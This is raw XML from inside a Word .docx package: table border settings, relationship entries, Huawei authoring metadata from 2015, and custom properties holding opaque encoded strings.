                        <w:left w:val="single" w:sz="6" w:space="0" w:color="C6C3C6"/>
                        <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C6C3C6"/>
                        <w:right w:val="single" w:sz="6" w:space="0" w:color="C6C3C6"/>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2.bin"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="embeddings/Microsoft_Office_Excel____1.xlsx"/><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yperlink" Target="http://10.175.45.132:8080/nsccp-portal/topic/toTopicReply?topicId=2864"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8E8C3-FD7E-434A-98F5-E26D317E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1747</Words>
  <Characters>9959</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>82</Lines>
  <Paragraphs>23</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Huawei Technologies Co.,Ltd.</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>11683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yuzhigang</dc:creator>
  <cp:lastModifiedBy>LocalAccount</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <cp:lastPrinted>2015-07-30T08:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-07-31T03:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-07-31T03:32:00Z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1437701981</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="_new_ms_pID_72543">
    <vt:lpwstr>(3)DwgzP0r38mAO7QQfeUCTTItuEBXUKmkMqQknLYDIwOHxguKYbCv94JQcxW4zuVs3RIqmFzmp
TN/MDgs3+WcScpom5jvmWQEHu/NPfxwQG9p8+IkdV+DALzPig1CvcruY1vnPQWSHy7CIpeB+
A2ysrb1Rd9jac1fi36D95yaLOJVFxixsHTqaAy7oFN7pwx65GN8vLyI0QbBdU9VuH1mo7pWq
ds86VkpL2aFVLE8OdI</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="_new_ms_pID_725431">
    <vt:lpwstr>YMuCCw7PnkwF+6Do4/m9HlEVZz18hnqCNs9WhfK5yD2sIb0PZtnv1/
zlp3Z8FsPcacgTBhQRgrROoCNai1Az/G8Wi0P+Mr7f8XzqcDNrzwxTrEcU/bH8H2tRkSQEXB
PXizIWtvApxZ615H0k1u0KI5CVrn2OnF7/Y2TGiAH0BlEdI5nSCwobXN7foxTb3pPC8U/4BB
HJhDzgABFnZ50fOpalXS7IAe20Gzv899+04g</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="_new_ms_pID_725432">
    <vt:lpwstr>1SxDFsjKfo5gATBtWM0b3XJhToYOJAz7acMV
pFGjyseu097S8og6hGRxR9QpTienqDJftdceY5eeAhRWzKVF2G1+h79CtRRBwo2EamYHXCPv
</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="_2015_ms_pID_725343">
    <vt:lpwstr>(3)a+M6EVBG7Xd/K0GdTeVpRLZwEso7J2RP52N/q72CXW4ET9UhGH6cpDZf0Anp/lbcyN+vt5Vp
xi4fk93YpY0TMLNn238b1OK1BKIdTITu2LswCkKCOBGHkfRYCnC5XQGULJw0XzPq7Xzz2QpW
/EJ7zkePO5sKzA5dxENdTLCIOwPRb8KLm8+dxHI2Em+S25JzBQvUV1sXc2IcM0LQSREQQ8qG
x2Kgk+pP8Geg3LAn8Y</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="_2015_ms_pID_7253431">
    <vt:lpwstr>M20Ub3MgEFAYbv88JrMWJE7oO1KItXVEhIt8YrJjFZHM5TlTsj507P
h3dO8ifQ5VeVSS41zhwR+0n28iVz/v90ehi3ZHnYvzvwCqPXknAgqwenK1qtyHtUxXS9xCS7
jrxdjxVsKjLywS4novl0lKYKRj7NMcReiqMYMjq28Qehg5ls/fHHdvUUa00fpvabz4ViGfb0
kpk4u2wWdekVu9NcFvN2b2J+s2EIBcGa+GF9</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="12" name="_2015_ms_pID_7253432">
    <vt:lpwstr>FFM8MDy++VzcXRvE6HDTGws=</vt:lpwstr>
  </property>
</Properties>
</file>